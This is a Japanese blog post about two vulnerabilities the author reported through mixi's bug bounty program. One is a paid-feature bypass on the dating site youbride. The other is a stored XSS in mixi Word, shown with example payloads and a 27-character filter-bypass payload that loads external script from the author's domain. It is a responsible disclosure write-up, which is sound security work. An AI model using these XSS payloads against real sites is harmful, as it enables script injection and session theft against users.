2014-04-09
mixiに報告した脆弱性2
mixiの脆弱性報告制度で報告して、修正された脆弱性。
youbrideの有料機能を無料で使える問題
- 2014/03/12 報告
- 2014/03/18 修正完了
- 2014/03/24 75,000円のAmazonギフトが届いた
youbrideはmixiの子会社の株式会社Diverseが運営する婚活サイト。一時、制度の対象だった。
youbrideでは無料ユーザーはプロフィールの公開条件は「全体に公開」しか選べない。
ChromeのDeveloper Toolで他の選択肢を有効にしたら、「全体に公開」以外の公開条件も選べてしまった。
mixiワードのXSS
- 2014/03/31 報告
- 2014/03/31 修正完了
- 2014/04/09 125,000円のAmazonギフトが届いた
mixiワードにXSS可能な脆弱性があった。
「猫」には、キャットタワー、キャットフード、猫の里親募集、捨て猫、子猫、イルカ、ペンギンなどのワードが関連しており、…
の部分。mixiワードはコミュニティを作成し、関連ワードから追加できる。出力時には何もエスケープされないけれど、文字数が30文字以内、/, (, )などが全角文字に変換されるという制限がある。
<script>alert(0)</script>
というようにスクリプトを埋め込もうとしても、scriptタグが閉じられない。後続の文字がスクリプトとして認識されると文法的にエラーになってスクリプトが動かない。スクリプト中で()が使えないのもつらい。
<script src="http://example.com/malicious.js">
と外部のスクリプトを読み込もうにも/が使えない。
答え
<script src=//イマ.net>
27文字。属性値ならば実体参照が使える。短いドメインを持っていて良かった。報告したときは、イマ.netのトップページがJavaScriptを返すようにした。ちなみに、mixiワードは一度作ったら消せないらしい。変なワードを作ってしまって申し訳ない。
トラックバック - http://d.hatena.ne.jp/kusano_k/20140409/1397059837
リンク元
- 20 http://t.co/86hQdVBd7C
- 6 http://pipes.yahoo.com/pipes/pipe.info?_id=02db597254ec68550537866a2fca2ce6
- 2 http://pipes.yahoo.com/pipes/pipe.info?_id=e4c70514b5136c08ae93591f390be2e2
- 1 http://api.twitter.com/1/statuses/show/453928799613108224.json
- 1 http://b.hatena.ne.jp/entrylist/it/はてなブログ
- 1 http://hatenablog.com/k/keywordblog/Amazon?mode=rss
- 1 http://reader.livedoor.com/reader/
- 1 http://reader.make.lu/
- 1 http://twipple.jp/
- 1 http://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDMQFjAC&url=http://d.hatena.ne.jp/kusano_k/20140409/1397059837&ei=kH1FU5XGH8K_lQW09YHQBQ&usg=AFQjCNEAIsKYjT6HOMraPzfM-HMlVygLGA&sig2=_A12j451YxjY9ZTCU1Oymg